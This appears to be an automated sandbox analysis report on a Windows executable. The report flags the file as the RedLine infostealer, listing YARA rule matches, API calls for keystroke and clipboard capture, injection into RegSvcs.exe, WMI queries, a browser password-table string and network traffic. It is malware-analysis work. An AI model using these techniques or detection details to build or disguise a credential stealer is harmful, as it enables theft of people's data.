                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007B425A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007A0219
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007CCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007CCDAC

                  System Summary

                  barindex
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: This is a third-party compiled AutoIt script.0_2_00743B4C
                  Source: b3u71vBG0u.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: b3u71vBG0u.exe, 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e202bed-3
                  Source: b3u71vBG0u.exe, 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_37f25ef6-8
                  Source: b3u71vBG0u.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_618bcf89-c
                  Source: b3u71vBG0u.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d395f2ec-9
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_007A4021
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00798858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00798858
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007A545F
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0074E8000_2_0074E800
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076DBB50_2_0076DBB5
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0074E0600_2_0074E060
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007C804A0_2_007C804A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007541400_2_00754140
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007624050_2_00762405
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007765220_2_00776522
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0077267E0_2_0077267E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007C06650_2_007C0665
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007568430_2_00756843
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076283A0_2_0076283A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007789DF0_2_007789DF
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00758A0E0_2_00758A0E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007C0AE20_2_007C0AE2
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00776A940_2_00776A94
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A8B130_2_007A8B13
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0079EB070_2_0079EB07
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076CD610_2_0076CD61
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007770060_2_00777006
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0075710E0_2_0075710E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007531900_2_00753190
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007412870_2_00741287
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007633C70_2_007633C7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076F4190_2_0076F419
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007616C40_2_007616C4
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007556800_2_00755680
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007678D30_2_007678D3
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007558C00_2_007558C0
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00761BB80_2_00761BB8
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00779D050_2_00779D05
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0074FE400_2_0074FE40
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076BFE60_2_0076BFE6
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00761FD00_2_00761FD0
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_023936200_2_02393620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_04F8E7B01_2_04F8E7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_04F8DC901_2_04F8DC90
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: String function: 00768B40 appears 42 times
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: String function: 00747F41 appears 35 times
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: String function: 00760D27 appears 70 times
                  Source: b3u71vBG0u.exe, 00000000.00000003.1691811074.0000000004153000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs b3u71vBG0u.exe
                  Source: b3u71vBG0u.exe, 00000000.00000003.1691922124.00000000042FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs b3u71vBG0u.exe
                  Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs b3u71vBG0u.exe
                  Source: b3u71vBG0u.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/51@1/1
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AA2D5 GetLastError,FormatMessageW,0_2_007AA2D5
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00798713 AdjustTokenPrivileges,CloseHandle,0_2_00798713
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00798CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00798CC3
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007AB59E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007BF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007BF121
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_007AC602
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00744FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00744FE9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeFile created: C:\Users\user\AppData\Local\Temp\aut13C0.tmpJump to behavior
                  Source: b3u71vBG0u.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tmp209C.tmp.1.dr, tmp20AC.tmp.1.dr, tmp20D0.tmp.1.dr, tmp20CF.tmp.1.dr, tmp20BD.tmp.1.dr, tmp20BE.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: b3u71vBG0u.exeVirustotal: Detection: 63%
                  Source: b3u71vBG0u.exeReversingLabs: Detection: 60%
                  Source: unknownProcess created: C:\Users\user\Desktop\b3u71vBG0u.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: wldp.dllJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: b3u71vBG0u.exeStatic file information: File size 1072128 > 1048576
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: b3u71vBG0u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
                  Source: b3u71vBG0u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: b3u71vBG0u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: b3u71vBG0u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: b3u71vBG0u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: b3u71vBG0u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007BC304 LoadLibraryA,GetProcAddress,0_2_007BC304
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0074C590 push eax; retn 0074h0_2_0074C599
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A8719 push FFFFFF8Bh; iretd 0_2_007A871B
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076E94F push edi; ret 0_2_0076E951
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076EA68 push esi; ret 0_2_0076EA6A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00768B85 push ecx; ret 0_2_00768B98
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076EC43 push esi; ret 0_2_0076EC45
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076ED2C push edi; ret 0_2_0076ED2E

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49734
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00744A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00744A35
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007C55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007C55FD
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007633C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007633C7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
